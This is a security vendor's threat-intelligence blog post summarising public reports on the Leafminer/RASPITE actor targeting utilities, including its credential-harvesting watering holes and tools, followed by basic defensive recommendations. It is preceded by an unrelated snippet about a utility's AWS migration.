This utility company typically performed data service applications using on-premises data centers, but as their business evolved, they looked to begin migrating various utility service applications to AWS. They initially tested a shift of water applications to the cloud, but not long after migration, they began experiencing a high volume of attacks on their new cloud infrastructure, which required high volume of manual response actions.
In July of 2018, the threat actor Leafminer was detailed by Symantec as having targeted a list of government organizations and business verticals in the Middle East since at least early 2017. The article also detailed several aspects of how the attacker attempted to breach targets. One method detailed was the attackers using “file://” URLs embedded on websites used as watering holes that prompted Windows users that visited the site to enter their SMB credentials. When users provided input, it would transmit the user’s NTLM hash to the attackers to be cracked offline.
There were additional traditional attack methods observed in the article including using brute force / dictionary attackers against public facing services, EternalBlue for lateral movement, and common attack software such as Mimikatz, PsExec, and THC Hydra.
After this article had been released, a cybersecurity vendor that specializes in ICS incident response, Dragos, reported they had discovered Leafminer targeting US entities in the utility vertical. Dragos suggested that the threat actor uses embedded links that prompt for SMB credentials as well indicating that US entities might be experiencing future watering hole attacks similar to what was seen in the Middle East. Dragos named this threat actor “RASPITE.”
Dragos suggested in the blog that they have not received any evidence that the attackers have gained the ability to infiltrate ICS systems once a foothold has been gained into a utility entity, but that the attackers likely trying to gain access to organizations to prepare for a later ICS attack.
Proficio Threat Intelligence Recommendations:
- Place two factor authentication on any public facing services where users authenticate.
- Make sure Windows servers inside the network are up-to-date and patched, especially against ETERNALBLUE and other related recent SMB vulnerabilities.
- Enforce password policies for Windows credentials such as complex passwords or periodic changes of passwords by users.
Symantec findings for Leafminer – Click Here
Dragos details on RASPITE – Click Here